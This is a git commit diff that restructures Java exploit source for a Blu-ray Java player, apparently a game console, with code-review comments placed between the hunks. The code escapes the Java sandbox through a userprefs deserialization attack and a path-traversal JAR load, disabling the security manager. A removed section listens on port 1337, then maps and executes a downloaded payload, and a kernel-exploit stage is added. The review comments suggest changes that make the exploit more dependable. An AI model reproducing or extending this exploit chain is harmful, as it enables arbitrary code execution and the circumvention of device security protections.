Restructure source code and improve Makefile.
This commit is contained in:
parent
94188d249f
commit
fab3db6d51
1
.gitignore
vendored
1
.gitignore
vendored
@ -1,4 +1,5 @@
|
||||
.idea/
|
||||
build/
|
||||
tools/
|
||||
lib/
|
||||
disc/CERTIFICATE/id.bdmv
|
||||
|
83
Makefile
83
Makefile
@ -1,34 +1,57 @@
|
||||
CLASSES = \
|
||||
com/bdjb/ExploitXlet.java \
|
||||
com/bdjb/Exploit.java \
|
||||
com/bdjb/ExploitInterface.java \
|
||||
com/bdjb/ExploitUserPrefsImpl.java \
|
||||
com/bdjb/ExploitServiceProxyImpl.java \
|
||||
com/bdjb/IxcProxyImpl.java \
|
||||
com/bdjb/ServiceInterface.java \
|
||||
com/bdjb/ServiceImpl.java \
|
||||
com/bdjb/ProviderAccessorImpl.java \
|
||||
com/bdjb/PayloadClassLoader.java \
|
||||
com/bdjb/Payload.java \
|
||||
com/bdjb/UnsafeInterface.java \
|
||||
com/bdjb/UnsafeJdkImpl.java \
|
||||
com/bdjb/UnsafeSunImpl.java \
|
||||
com/bdjb/API.java \
|
||||
com/bdjb/JIT.java \
|
||||
com/bdjb/Screen.java \
|
||||
BUILD = build
|
||||
BDMV = bdmv
|
||||
DISC = disc
|
||||
LIB = lib
|
||||
SRC = src
|
||||
TOOLS = tools
|
||||
|
||||
all:
|
||||
javac com/bdjb/PayloadClassLoaderSerializer.java && java com/bdjb/PayloadClassLoaderSerializer
|
||||
javac -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "lib/rt.jar:lib/bdjstack.jar" $(CLASSES)
|
||||
jar cf disc/BDMV/JAR/00000.jar com/bdjb/*.class com/bdjb/*.ser com/bdjb/bluray.ExploitXlet.perm
|
||||
java -cp "tools/security.jar:tools/bcprov-jdk15-137.jar:tools/tools.jar" net.java.bd.tools.security.BDSigner disc/BDMV/JAR/00000.jar
|
||||
java -jar tools/bdjo.jar bdmv/bdjo.xml disc/BDMV/BDJO/00000.bdjo
|
||||
java -jar tools/MovieObject.jar bdmv/MovieObject.xml disc/BDMV/MovieObject.bdmv
|
||||
java -jar tools/index.jar bdmv/index.xml disc/BDMV/index.bdmv
|
||||
java -jar tools/id.jar bdmv/id.xml disc/CERTIFICATE/id.bdmv
|
||||
CLASSES = \
|
||||
$(SRC)/com/bdjb/ExploitXlet.java \
|
||||
$(SRC)/com/bdjb/Exploit.java \
|
||||
$(SRC)/com/bdjb/UnsafeInterface.java \
|
||||
$(SRC)/com/bdjb/UnsafeJdkImpl.java \
|
||||
$(SRC)/com/bdjb/UnsafeSunImpl.java \
|
||||
$(SRC)/com/bdjb/API.java \
|
||||
$(SRC)/com/bdjb/JIT.java \
|
||||
$(SRC)/com/bdjb/Screen.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
|
||||
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
|
||||
|
||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||
|
||||
all: directory serialized classes jar bdmv
|
||||
|
||||
directory:
|
||||
mkdir -p $(BUILD)
|
||||
|
||||
serialized:
|
||||
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
|
||||
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
|
||||
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
|
||||
|
||||
classes:
|
||||
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
|
||||
|
||||
jar:
|
||||
rm -rf $(BUILD)/jdk
|
||||
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
|
||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||
|
||||
bdmv:
|
||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
||||
java -jar $(TOOLS)/id.jar $(BDMV)/id.xml $(DISC)/CERTIFICATE/id.bdmv
|
||||
|
||||
clean:
|
||||
rm -rf jdk/internal/misc/*.class
|
||||
rm -rf com/bdjb/*.class
|
||||
rm -rf com/bdjb/*.ser
|
||||
rm -rf build
|
||||
rm -rf META-INF
|
||||
|
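Review bot: `all: directory serialized classes jar bdmv` only works because make happens to run the prerequisites left to right; none of the new targets declare a dependency on each other and none are marked `.PHONY`, so `make -j` or a bare `make jar` can run `jar` before `classes` has populated `$(BUILD)`, and a stray file named `jar` or `classes` would silently skip the step. Declaring the order fixes both: `.PHONY: all directory serialized classes jar bdmv clean`, `serialized classes: directory` and `jar: serialized classes`. The `clean` target also still removes `jdk/internal/misc/*.class`, `com/bdjb/*.class`, `com/bdjb/*.ser` and `META-INF`, which appear to be paths from the pre-`$(BUILD)` layout and are now covered by `rm -rf build`.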
@ -1,93 +0,0 @@
|
||||
/*
|
||||
* Copyright (C) 2021 Andy Nguyen
|
||||
*
|
||||
* This software may be modified and distributed under the terms
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
import java.io.OutputStream;
|
||||
import java.net.InetAddress;
|
||||
import java.net.ServerSocket;
|
||||
import java.net.Socket;
|
||||
|
||||
class Exploit implements Runnable {
|
||||
static void init() {
|
||||
Screen.println("[+] bd-jb by theflow");
|
||||
|
||||
Screen.println("[*] Disabling security manager...");
|
||||
|
||||
ExploitInterface[] exploits =
|
||||
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
|
||||
|
||||
for (int i = 0; i < exploits.length; i++) {
|
||||
try {
|
||||
exploits[i].trigger();
|
||||
if (System.getSecurityManager() == null) {
|
||||
break;
|
||||
}
|
||||
} catch (Exception e) {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
if (System.getSecurityManager() != null) {
|
||||
Screen.println("[-] Error could not disable security manager.");
|
||||
}
|
||||
}
|
||||
|
||||
static void start() {
|
||||
new Thread(new Exploit()).start();
|
||||
}
|
||||
|
||||
public void run() {
|
||||
if (System.getSecurityManager() != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
Screen.println("[*] Installing native API...");
|
||||
API api = API.getInstance();
|
||||
|
||||
Screen.println("[*] Enabling JIT...");
|
||||
JIT jit = JIT.getInstance();
|
||||
|
||||
Screen.println(
|
||||
"[*] Listening for payload on "
|
||||
+ InetAddress.getLocalHost().getHostAddress()
|
||||
+ ":1337...");
|
||||
|
||||
ServerSocket serverSocket = new ServerSocket(1337);
|
||||
Socket socket = serverSocket.accept();
|
||||
|
||||
Screen.println("[*] Downloading payload...");
|
||||
|
||||
InputStream inputStream = socket.getInputStream();
|
||||
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
|
||||
|
||||
byte[] buf = new byte[8192];
|
||||
int read;
|
||||
while ((read = inputStream.read(buf)) > 0) {
|
||||
outputStream.write(buf, 0, read);
|
||||
}
|
||||
|
||||
outputStream.close();
|
||||
inputStream.close();
|
||||
|
||||
socket.close();
|
||||
|
||||
Screen.println("[*] Mapping payload...");
|
||||
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
|
||||
Screen.println("[+] payload: " + Long.toHexString(payload));
|
||||
|
||||
Screen.println("[*] Executing payload...");
|
||||
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
|
||||
Screen.println("[+] Result: " + ret);
|
||||
} catch (Exception e) {
|
||||
Screen.println("[-] Error: " + e.getMessage());
|
||||
}
|
||||
}
|
||||
}
|
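--- /dev/null
+++ b/src/com/bdjb/Exploit.java
@@ -0,0 +1,69 @@
+/*
+* Copyright (C) 2021 Andy Nguyen
+*
+* This software may be modified and distributed under the terms
+* of the MIT license. See the LICENSE file for details.
+*/
+
+package com.bdjb;
+
+import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
+import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
+import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
+import com.bdjb.exploit.kernel.ExploitKernelInterface;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.InetAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+
+class Exploit implements Runnable {
+static void init() {
+Screen.println("[+] bd-jb by theflow");
+
+Screen.println("[*] Escaping Java Sandbox...");
+
+ExploitSandboxInterface[] exploits =
+new ExploitSandboxInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
+
+for (int i = 0; i < exploits.length; i++) {
+try {
+exploits[i].trigger();
+if (System.getSecurityManager() == null) {
+break;
+}
+} catch (Exception e) {
+continue;
+}
+}
+
+if (System.getSecurityManager() != null) {
+Screen.println("[-] Error could not disable security manager.");
+}
+}
+
+static void start() {
+new Thread(new Exploit()).start();
+}
+
+public void run() {
+if (System.getSecurityManager() != null) {
+return;
+}
+
+Screen.println("[*] Exploiting kernel...");
+
+ExploitKernelInterface[] exploits = new ExploitKernelInterface[] {};
+
+for (int i = 0; i < exploits.length; i++) {
+try {
+if (exploits[i].trigger()) {
+break;
+}
+} catch (Exception e) {
+continue;
+}
+}
+}
+}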
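Review bot: The `java.io.FileOutputStream`, `InputStream`, `OutputStream`, `java.net.InetAddress`, `ServerSocket` and `Socket` imports are unused now that `run()` no longer downloads a payload; drop them. The two stages also disagree on how success is signalled: `init()` ignores the boolean that `ExploitSandboxInterface.trigger()` now returns and re-checks `System.getSecurityManager()`, while `run()` relies solely on the boolean from `ExploitKernelInterface.trigger()`, so one convention should be chosen for both loops. `run()` further reports nothing when no kernel exploit succeeds — with the array currently empty it always falls through silently after `[*] Exploiting kernel...` — whereas `init()` prints an error; a `boolean success` set in the loop and a matching `Screen.println("[-] Error could not exploit kernel.");` afterwards would keep the stages consistent. Both `catch (Exception e) { continue; }` blocks also drop the cause that the removed `run()` used to print via `e.getMessage()`, which makes a failed stage hard to diagnose from the screen output.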
@ -5,8 +5,8 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.kernel;
|
||||
|
||||
interface ExploitInterface {
|
||||
public void trigger() throws Exception;
|
||||
public interface ExploitKernelInterface {
|
||||
public boolean trigger() throws Exception;
|
||||
}
|
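--- /dev/null
+++ b/src/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java
@@ -0,0 +1,12 @@
+/*
+* Copyright (C) 2021 Andy Nguyen
+*
+* This software may be modified and distributed under the terms
+* of the MIT license. See the LICENSE file for details.
+*/
+
+package com.bdjb.exploit.sandbox;
+
+public interface ExploitSandboxInterface {
+public boolean trigger() throws Exception;
+}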
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -16,19 +16,19 @@ import java.security.Provider;
|
||||
import java.security.Security;
|
||||
|
||||
/** Implementation of the service+proxy exploit. */
|
||||
class ExploitServiceProxyImpl implements ExploitInterface {
|
||||
public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
|
||||
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
|
||||
|
||||
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
|
||||
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
|
||||
"(Ljava/lang/Object;)Ljava/lang/Object;";
|
||||
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
|
||||
|
||||
private static final String JAR_URL =
|
||||
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
|
||||
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
|
||||
|
||||
public void trigger() throws Exception {
|
||||
public boolean trigger() throws Exception {
|
||||
// Throw exception if class does not exist.
|
||||
Class.forName(SERVICE_CLASS_NAME);
|
||||
|
||||
@ -56,5 +56,7 @@ class ExploitServiceProxyImpl implements ExploitInterface {
|
||||
// Instantiate the payload class with all permissions to disable the security manager.
|
||||
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
|
||||
payloadClass.newInstance();
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
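Review bot: The new `return true;` after `payloadClass.newInstance()` reports success unconditionally, but the caller in `Exploit.init()` defines success as the security manager being gone, so a payload that instantiates without disabling it still yields true; `return System.getSecurityManager() == null;` would make the boolean match the contract the interface now expresses. The `trigger()` body between the second and third hunks is not shown here.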
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -14,16 +14,17 @@ import java.io.OutputStream;
|
||||
import org.havi.ui.HSceneFactory;
|
||||
|
||||
/** Implementation of the userprefs deserialization exploit. */
|
||||
class ExploitUserPrefsImpl implements ExploitInterface {
|
||||
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
|
||||
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
|
||||
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
|
||||
|
||||
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
|
||||
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
|
||||
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
|
||||
|
||||
public void trigger() throws Exception {
|
||||
public boolean trigger() throws Exception {
|
||||
try {
|
||||
// Overwrite userprefs with a serialized PayloadClassLoader.
|
||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
|
||||
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
|
||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
|
||||
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
|
||||
|
||||
byte[] buf = new byte[8192];
|
||||
int read;
|
||||
@ -42,15 +43,19 @@ class ExploitUserPrefsImpl implements ExploitInterface {
|
||||
|
||||
// Instantiate the payload class.
|
||||
PayloadClassLoader.getInstance().newPayload();
|
||||
|
||||
return true;
|
||||
}
|
||||
} finally {
|
||||
// Restore userprefs file.
|
||||
String[][] preferences = new String[9][];
|
||||
preferences[3] = new String[] {"26"};
|
||||
ObjectOutputStream outputStream =
|
||||
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
|
||||
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
|
||||
outputStream.writeObject(preferences);
|
||||
outputStream.close();
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
}
|
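Review bot: The new `return true;` inside the `try` can be silently replaced by an exception from the restore step in `finally`: `outputStream.writeObject(preferences)` is not guarded, so a failure there both masks the return value and leaks the `ObjectOutputStream`. Closing in a nested block — `try { outputStream.writeObject(preferences); } finally { outputStream.close(); }` — keeps the restore attempt while preventing the leak. The `inputStream`/`outputStream` pair opened at the top of `trigger()` is likewise not closed on an exception path, though the part of the body that uses them lies outside the hunk. Note that a successful escape followed by a failed restore is reported to `init()` as an exception, which then moves on to the next exploit; whether that is intended should be confirmed.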
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.sony.gemstack.core.CoreAppContext;
|
||||
import com.sony.gemstack.core.CoreIxcClassLoader;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.security.AccessController;
|
||||
import java.security.PrivilegedActionException;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -19,8 +19,8 @@ import java.security.ProtectionDomain;
|
||||
class PayloadClassLoader extends ClassLoader implements Serializable {
|
||||
private static final long serialVersionUID = 0x4141414141414141L;
|
||||
|
||||
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/Payload.class";
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
|
||||
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
|
||||
|
||||
private static PayloadClassLoader instance;
|
||||
|
@ -5,8 +5,9 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.bdjb.exploit.sandbox.PayloadClassLoader;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
|
||||
@ -14,8 +15,7 @@ import java.io.ObjectOutputStream;
|
||||
class PayloadClassLoaderSerializer {
|
||||
public static void main(String[] args) {
|
||||
try {
|
||||
ObjectOutputStream objectOutputStream =
|
||||
new ObjectOutputStream(new FileOutputStream("com/bdjb/PayloadClassLoader.ser"));
|
||||
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
|
||||
objectOutputStream.writeObject(new PayloadClassLoader());
|
||||
objectOutputStream.close();
|
||||
} catch (Exception e) {
|
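Review bot: `import com.bdjb.exploit.sandbox.PayloadClassLoader;` is redundant because the file is now in `package com.bdjb.exploit.sandbox;` itself. `args[0]` is read without checking `args.length`, so running the serializer without the output path the Makefile now passes fails with an `ArrayIndexOutOfBoundsException` inside the generic `catch` rather than a usage message; `if (args.length != 1) { System.err.println("usage: PayloadClassLoaderSerializer <output.ser>"); return; }` before the `try` would make that explicit. The `catch` block continues outside the hunk.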
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.oracle.ProviderAccessor;
|
||||
import com.oracle.ProviderAdapter;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.oracle.security.Service;
|
||||
import java.util.List;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.rmi.Remote;
|
||||
import java.rmi.RemoteException;
|